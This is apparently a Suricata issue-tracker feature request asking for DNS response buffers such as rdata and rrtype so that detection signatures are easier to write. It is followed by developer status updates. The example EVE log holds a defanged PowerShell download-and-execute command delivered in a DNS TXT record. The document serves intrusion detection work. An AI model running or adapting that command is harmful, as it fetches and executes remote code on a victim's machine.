Feature #2448
openAdd additional buffers for DNS Responses
Description
Hi,
It would be nice to be able to include additional buffers for the DNS protocol responses to help write more efficient and effective signatures.
I think buffers for sections like rdata and rrtype should be included to cover things like data in TXT Records, but it could be expanded to cover the other sections of the response.
{
"timestamp":"2018-02-14T19:12:58.760866-0700",
"flow_id":345727363089610,
"pcap_cnt":4,
"event_type":"dns",
"src_ip":"8.8.8.8",
"src_port":53,
"dest_ip":"192.168.0.105",
"dest_port":49153,
"proto":"UDP",
"dns":{
"type":"answer",
"id":2,
"rcode":"NOERROR",
"rrname":"shinobotps1[.]com",
"rrtype":"TXT",
"ttl":3600,
"rdata":"powershell IEX (New-Object Net.WebClient).DownloadString('hxxps:\/\/shinobotps1[.]com\/download_get.php');"
}
}
Thanks!
Updated by Jason Ish almost 7 years ago
- Related to Feature #2198: Extend the DNS parser to accept dns_response keyword in signatures added
Updated by Andreas Herz almost 7 years ago
- Assignee set to OISF Dev
- Target version set to TBD
Updated by Victor Julien about 5 years ago
- Target version changed from TBD to 6.0.0beta1
Updated by Victor Julien over 4 years ago
- Target version changed from 6.0.0beta1 to 7.0.0-beta1
Updated by Jason Ish about 4 years ago
- Related to Task #4097: Suricon 2020 brainstorm added
Updated by Jason Ish about 4 years ago
As discussed today in the 2020 brainstorm this is still a desired feature. It should be more or less trivial, but could serve as an example of unifying eve logged buffers, and buffers available for detection. At the very least, the rdata buffer should be exposed a sticky for content matches.
Updated by Victor Julien about 3 years ago
- Target version changed from 7.0.0-beta1 to 8.0.0-beta1
Updated by Brandon Murphy over 1 year ago
It would be nice to have all dns flags parsed as well
perhaps like a dns.flags.z, dns.flags.replycode, etc
doing so would avoid the use of byte_test which are often difficult to read for users attempted to understand the logic in a rule.
Updated by Jason Ish 5 months ago
- Related to Feature #7012: Add dns.response sticky buffer added
Updated by Jason Ish 5 months ago
- Related to Feature #5642: DNS: parity between log fields and detection added